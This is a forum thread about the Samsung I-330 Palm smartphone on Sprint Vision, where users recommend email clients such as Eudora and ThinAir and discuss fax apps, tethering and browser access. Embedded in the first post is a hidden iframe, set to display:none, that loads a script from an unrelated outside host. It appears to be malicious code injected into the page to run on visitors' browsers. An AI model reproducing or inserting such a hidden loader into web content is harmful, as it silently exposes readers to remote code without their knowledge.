Poll: Are you a Newton MP user? Past or Present?

+ Reply to Thread

Samsung I-330 and Sprint Vision

I just recently purchased the I-330. Have used it for two days. It is a very nice PDA with phone capabilities. I was hoping for a more integrated solution.

The I-330 doesn't seem to take advantage of the web connection and the vision service. I want to send/receive emails directly from the phone (no hot synch). I'm also having trouble getting the SprintPCS configuration completed...might be a Sprint thing.

Am I missing something?

Now, finally to my question: What software can I load on the I-330 to get true wireless email capabilities and stay integrated with the built-in address book? Also, can the I-330 be used as a bridge/gateway/router for my laptop using the IP address from the Vision service? What's the best FAX solution software for the I-330?

Thanks in advance!

BTW: This is an excellent site.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Leonard Knight
    lrknight@dbrsystems.com

http://www.dbrsystems.com

I find Eudora works well for handling e mail on the I330. I'm not sure how it works with the built in address book, but the e mail end works great. BCA

Editor and Site Administrator Convergent's Avatar

Poll

Do I detect a bit of sarcasm in that poll??? I like it! And.... no, I've never experienced owning a Newton.
    Mike - Been Converged?

Registered User jason.ate.paint's Avatar
    As far as applications go, you're pretty free to install any application that is Palm 3.x compatible. I haven't found anything that won't run yet.

Email Apps
    There is an application called ThinAir 1.4, which is a pretty good email application, that integrates with your existing Palm address book. It's actually a pretty good application. It integrates the ability for using NNTP (Newsgroups) and ICQ. The only downside to the application is that ThinAirApps, the company that wrote the software has moved on to bigger and better things and no longer supports the application. But BETTER news, it's freeware... so it's totally worth a look.

ThinAir 1.4
    http://software.palm.com/PlatformPro...=442&catalog=1

Using the I330 as a modem
    I have read in the forums that the I300 data cable "should" work with the I330, but it hasn't been confirmed. I have been debating buying one as it might be more work than it's worth if I can get basic browsing and email done over the phone itself. I have been checking the SprintPCS accessory website, but they still don't have the cable for the I330. At this point, you could always take a chance with the I300 cable and return it if it didn't work... then let us know.

Faxing on the I330
    I did a quick search on Palm.com and I got 4 hits for Wireless Fax applications. I haven't actually had a chance to try them out, but they're all freeware, so you might let us know which one you liked best.
    http://software.palm.com/PlatformSea...eless+Software

Business Connection Email Service

Sprint Business Connection

http://www.sprint.com/pcsbusiness/products_services/data/bcpe.html

works pretty well (if you have an always on internet connection on your computer), but I am not sure that I am going to enjoy paying the $5 a month for it after the free two month trial.

You can also get access to send files from your computer as well.

Its a bit tricky to set up and be sure to disable the automatic check for new email.

Use alerts instead that you setup on the web side of the service. It will email you if you get new mail.

Re: Samsung I-330 and Sprint Vision

Originally posted by "dbrs"

I just recently purchased the I-330. Have used it for two days. It is a very nice PDA with phone capabilities. I was hoping for a more integrated solution.

The I-330 doesn't seem to take advantage of the web connection and the vision service. I want to send/receive emails directly from the phone (no hot synch). I'm also having trouble getting the SprintPCS configuration completed...might be a Sprint thing.

Am I missing something?

Now, finally to my question: What software can I load on the I-330 to get true wireless email capabilities and stay integrated with the built-in address book? Also, can the I-330 be used as a bridge/gateway/router for my laptop using the IP address from the Vision service? What's the best FAX solution software for the I-330?

Thanks in advance!

BTW: This is an excellent site.
    For wireless email, Eudora (freeware) is extremely popular and offers tons of options to customize it to your needs. Yes, you can use your I330 as a wireless laptop modem. Connect the I330 to you laptop via the cradle or an optional data cable (ebay likely has some for sale, not Sprint though).

For your Sprint confidugration problem, since you did not provide details on the problem, I can't really help you out. Your best bet would probably be to contact Vision support.

The I330 is a very integrated device (as are most Palm smartphones). You simply need to add additional software to bring it up to its full capabilities in order to take advantage of its wireless features. The good news is is that because it runs the PalmOS, there are thousands of free programs available that will run perfectly fine on the I330 allowing you to add the additional functionality you seek.

The I330 Shortcomings

I330 Users:

The I330 cannot access the Sprint network via any of it's Browzers. I think this is Sprint's fault and or maybe Samsung too, but you can do email with Eudora Suite 2.1 installed. To use Sprint's short mail on the I330 you have to purchase I330SMS from PDAapps.com. On my older Kyocera 6035, you can access the Sprint network right on the phone itself. You didn't need any extra software. I actually like my 6035 better than my I330 for this reason and the fact that it has a physical keypad. The I330 is faster at internet access though and Sprint Vision is unlimited so I can't argue with it's few advantages.

Re: The I330 Shortcomings

Originally posted by "ronboykin"

The I330 cannot access the Sprint network via any of it's Browzers....The I330 is faster at internet access though and Sprint Vision is unlimited so I can't argue with it's few advantages.
    Hu??? Kind of contradicting yourself here? You can certainly use Blazer to access Sprint Vision, which is part of Sprint's network.

I-330 and the internet

Thanks to everyone for the great information. I have decided on Eudora for my email client. It works great and is FREE!

I've tried the Blazer browser, the PocketLink browser and the Eudora browser. Pocketlink is cool but very slow due to all the graphics. Eudora is my default browser and again it's FREE!

Has anyone found a nice flip case for the i-330? The case that came with the phone is a little clumbsy for accessing the screen quickly/one-handed.

Thanks,
    Leonard Knight
    lrknight@dbrsystems.com

http://www.dbrsystems.com

Re: Re: The I330 Shortcomings

Originally posted by Marty
    Hu??? Kind of contradicting yourself here? You can certainly use Blazer to access Sprint Vision, which is part of Sprint's network.
    I doubt it very much. We are talking about accessing http://vision.sprintpcs.com, which is a WAP-only site, not the desktop site at http://www.sprintpcs.com, which bloated as it is, some folks have reported some success with, although I believe that secure login was buggy.

As far as anyone has been able to determine, Sprint (in their infinite wisdom) has blocked their own PDAphones from accessing their vision home site, apparently because the Blazer browser uses a proxy that is based outside of Sprint's network.

That is why, for better or for worse, applications like Scott's SMS app and perhaps some 'native mode' browsers, like iPanel, may be more successful, since they do not depend on using 3rd party external proxies, and route their connections directly over the Sprint vision network, instead of out and (attempted) back in again.
    PCS Vision? At least *they* can see the future...

Administrator

Arrow

business connect is great however you need to leave your PC on.

snappermail is an all in one solution but may do more that you need...

gopherking is also a great email app.... it has a pqa and you can access it via the web...

no ringers, etc. are used for this phone nor the vision (except the 3G speeds).

welcome!